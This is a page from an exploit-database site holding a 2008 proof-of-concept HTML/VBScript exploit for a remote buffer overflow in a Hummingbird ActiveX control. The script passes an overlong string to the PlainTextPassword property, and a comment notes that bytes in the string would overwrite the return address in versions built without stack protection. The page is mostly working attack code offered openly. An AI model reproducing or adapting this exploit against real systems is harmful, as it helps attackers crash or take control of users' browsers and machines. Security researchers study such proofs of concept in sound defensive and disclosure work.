[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Hummingbird <= 13.0 ActiveX Remote Buffer Overflow PoC

Author
Thomas Pollet
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6645
Category
dos / poc
Date add
15-10-2008
Platform
unsorted
======================================================
Hummingbird <= 13.0 ActiveX Remote Buffer Overflow PoC
======================================================





<html>

<!--

the latest version of this activex (13.0) is compiled with /gs,  earlier versions aren't.
The XXXX would have overwritten return address.
by thomas.pollet@gmail.com

-->

<object classid='clsid:FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2' id='target' ></object>
<script language='vbscript'>
arg1="001101220123012401250126012701280129012:012;012<012=012>012?012@012A012B012C012D012E012FXXXX"
target.PlainTextPassword = arg1

</script>
</html>




#  0day.today [2024-10-06]  #